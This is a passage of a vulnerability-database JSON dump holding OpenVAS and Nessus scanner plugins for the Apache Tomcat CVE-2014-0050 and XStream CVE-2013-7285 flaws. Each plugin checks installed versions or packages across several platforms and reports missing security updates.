"http://plugins.openvas.org/nasl.php?oid=1361412562310804251", "type": "openvas", "title": "Apache Tomcat Content-Type Header Denial Of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tomcat_content_type_hdr_dos_vuln.nasl 35236 2014-03-24 15:09:34Z mar$\n#\n# Apache Tomcat Content-Type Header Denial Of Service Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804251\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-24 15:09:34 +0530 (Mon, 24 Mar 2014)\");\n script_name(\"Apache Tomcat Content-Type Header Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56830\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90987\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31615\");\n script_xref(name:\"URL\", value:\"http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Tomcat and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper handling of Content-Type HTTP header for\n multipart requests\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service condition.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat version 7.0.x before 7.0.51 and 8.0.0 before 8.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 7.0.51, 8.0.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! 
infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"7.0.0\", test_version2:\"7.0.50\" ) ||\n version_in_range( version:vers, test_version:\"8.0.0.RC1\", test_version2:\"8.0.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.0.51/8.0.2\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:1361412562310867519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867519", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867519\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n script_tag(name:\"affected\", value:\"apache-commons-fileupload on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2183\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:12:32", "description": "This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-02-23T00:00:00", "title": "Fedora 19 : xstream-1.3.1-5.1.fc19 (2014-2340)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-02-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:xstream"], "id": "FEDORA_2014-2340.NASL", "href": "https://www.tenable.com/plugins/nessus/72629", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2340.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72629);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_bugtraq_id(64760);\n script_xref(name:\"FEDORA\", value:\"2014-2340\");\n\n script_name(english:\"Fedora 19 : xstream-1.3.1-5.1.fc19 (2014-2340)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is 
missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1051277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128864.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64b83dc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xstream package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This 
script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"xstream-1.3.1-5.1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xstream\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:32", "description": "This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-02-23T00:00:00", "title": "Fedora 20 : xstream-1.3.1-9.fc20 (2014-2372)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-02-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xstream", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-2372.NASL", "href": "https://www.tenable.com/plugins/nessus/72630", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2372.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72630);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_bugtraq_id(64760);\n script_xref(name:\"FEDORA\", value:\"2014-2372\");\n\n script_name(english:\"Fedora 20 : xstream-1.3.1-9.fc20 (2014-2372)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1051277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aaa83c1b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xstream package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"xstream-1.3.1-9.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xstream\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T09:25:01", "description": "A version of Artifactory prior to 3.1.1.1 is hosted on the remote web\nserver. 
As such, it uses a library that has a known remote code\nexecution vulnerability.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-03-12T00:00:00", "title": "Artifactory < 3.1.1.1 XStream Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-03-12T00:00:00", "cpe": ["cpe:/a:jfrog:artifactory"], "id": "ARTIFACTORY_3_1_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/72966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72966);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_bugtraq_id(64760);\n\n script_name(english:\"Artifactory < 3.1.1.1 XStream Remote Code Execution\");\n script_summary(english:\"Checks version of Artifactory\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application uses a library with a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A version of Artifactory prior to 3.1.1.1 is hosted on the remote web\nserver. 
As such, it uses a library that has a known remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Artifactory 3.1.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-7285\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jfrog:artifactory\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"artifactory_detect.nbin\");\n script_require_keys(\"www/Artifactory\");\n script_require_ports(\"Services/www\", 8081);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"Artifactory\";\nfixed = \"3.1.1.1\";\n\nport = get_http_port(default:8081);\n\ninstall = get_install_from_kb(appname:app, port:port, exit_on_fail:TRUE);\n\nversion = install[\"ver\"];\npath = install[\"dir\"];\n\nif (ver_compare(ver:version, fix:fixed, strict:FALSE) >= 0)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, path, version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n URL : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:05:31", "description": "The remote host is affected by the vulnerability described in GLSA-201612-35\n(XStream: Remote execution of arbitrary code)\n\n It was found that XStream would deserialize arbitrary user-supplied XML\n content, thus representing objects of any type.\n \nImpact :\n\n A remote attacker could pass a specially crafted XML document to\n XStream, possibly resulting in the execution of arbitrary code with the\n privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-13T00:00:00", "title": "GLSA-201612-35 : XStream: Remote execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2016-12-13T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:xstream"], "id": "GENTOO_GLSA-201612-35.NASL", "href": 
"https://www.tenable.com/plugins/nessus/95738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-35.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95738);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_xref(name:\"GLSA\", value:\"201612-35\");\n\n script_name(english:\"GLSA-201612-35 : XStream: Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-35\n(XStream: Remote execution of arbitrary code)\n\n It was found that XStream would deserialize arbitrary user-supplied XML\n content, thus representing objects of any type.\n \nImpact :\n\n A remote attacker could pass a specially crafted XML document to\n XStream, possibly resulting in the execution of arbitrary code with the\n privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-35\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All XStream users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 
'>=dev-java/xstream-1.4.8-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-java/xstream\", unaffected:make_list(\"ge 1.4.8-r1\"), vulnerable:make_list(\"lt 1.4.8-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"XStream\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:14:14", "description": "An updated jasperreports-server-pro package that fixes one security\nissue is now available.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Red Hat Enterprise Virtualization reports package provides a suite\nof pre-configured reports and dashboards that enable you to monitor\nthe system. 
The reports module is based on JasperReports and\nJasperServer, and can also be used to create ad-hoc reports.\n\nXStream is a simple library used by the Red Hat Enterprise\nVirtualization reports package to serialize and de-serialize objects\nto and from XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied\nXML content, representing objects of any type. A remote attacker able\nto pass XML to XStream could use this flaw to perform a variety of\nattacks, including remote code execution in the context of the server\nrunning the XStream application. (CVE-2013-7285)\n\nAll jasperreports-server-pro users are advised to upgrade to this\nupdated package, which contains a backported patch to correct this\nissue.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : jasperreports-server-pro (RHSA-2014:0389)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jasperreports-server-pro", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0389.NASL", "href": "https://www.tenable.com/plugins/nessus/79007", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0389. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79007);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_xref(name:\"RHSA\", value:\"2014:0389\");\n\n script_name(english:\"RHEL 6 : jasperreports-server-pro (RHSA-2014:0389)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated jasperreports-server-pro package that fixes one security\nissue is now available.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Red Hat Enterprise Virtualization reports package provides a suite\nof pre-configured reports and dashboards that enable you to monitor\nthe system. The reports module is based on JasperReports and\nJasperServer, and can also be used to create ad-hoc reports.\n\nXStream is a simple library used by the Red Hat Enterprise\nVirtualization reports package to serialize and de-serialize objects\nto and from XML.\n\nIt was found that XStream could deserialize 